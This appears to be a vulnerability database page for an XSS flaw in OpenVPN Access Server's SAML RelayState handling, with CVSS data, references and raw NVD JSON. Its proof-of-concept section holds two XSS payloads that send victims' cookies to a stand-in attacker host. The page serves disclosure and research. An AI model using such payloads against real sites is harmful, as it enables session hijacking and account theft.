CVE-2025-50055

Description

Cross-site scripting (XSS) vulnerability in the SAML Authentication module in OpenVPN Access Server version 2.14.0 through 2.14.3 allows configured remote SAML Assertion Consumer Service (ACS) endpoint servers to inject arbitrary web script or HTML via the RelayState parameter

CVSS Details

CVSS Score

6.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

OpenVPN Access Server 2.14.0

OpenVPN Access Server 2.14.1

OpenVPN Access Server 2.14.2

OpenVPN Access Server 2.14.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import urllib.parse

# CVE-2025-50055 PoC - OpenVPN Access Server SAML XSS via RelayState
# This PoC demonstrates how an attacker can inject malicious JavaScript 
# through the RelayState parameter in the SAML ACS endpoint

target_url = "https://vpn.example.com/saml/acs"

# Malicious RelayState payload - XSS via img tag onerror handler
xss_payload = '<img src=x onerror="fetch(\'https://attacker.com/log?cookie=\'+document.cookie)">'

# Encode the payload for URL
encoded_payload = urllib.parse.quote(xss_payload)

# Construct the SAML response URL with malicious RelayState
# In real attack, this would be part of a crafted SAML Response
malicious_url = f"{target_url}?RelayState={encoded_payload}"

print(f"Target: {target_url}")
print(f"Malicious URL: {malicious_url}")
print(f"Encoded Payload: {encoded_payload}")

# Alternative payload using script tag
script_payload = '<script>document.location="https://attacker.com/steal?data="+btoa(document.cookie)</script>'
encoded_script = urllib.parse.quote(script_payload)
print(f"\nAlternative script payload: {encoded_script}")

# The actual attack would involve:
# 1. Creating a malicious SAML Response with the XSS payload in RelayState
# 2. Tricking the victim into visiting the crafted URL or submitting the response
# 3. When the server reflects the RelayState without sanitization, XSS executes

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-50055
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-50055
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-50055/
[4] VulDB https://vuldb.com/cve/CVE-2025-50055
[5] https://openvpn.net/as-docs/as-3-0-release-notes.html#access-server-3-0-0

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-50055", "sourceIdentifier": "[email protected]", "published": "2025-10-27T14:15:40.687", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-site scripting (XSS) vulnerability in the SAML Authentication module in OpenVPN Access Server version 2.14.0 through 2.14.3 allows configured remote SAML Assertion Consumer Service (ACS) endpoint servers to inject arbitrary web script or HTML via the RelayState parameter"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://openvpn.net/as-docs/as-3-0-release-notes.html#access-server-3-0-0", "source": "[email protected]"}]}}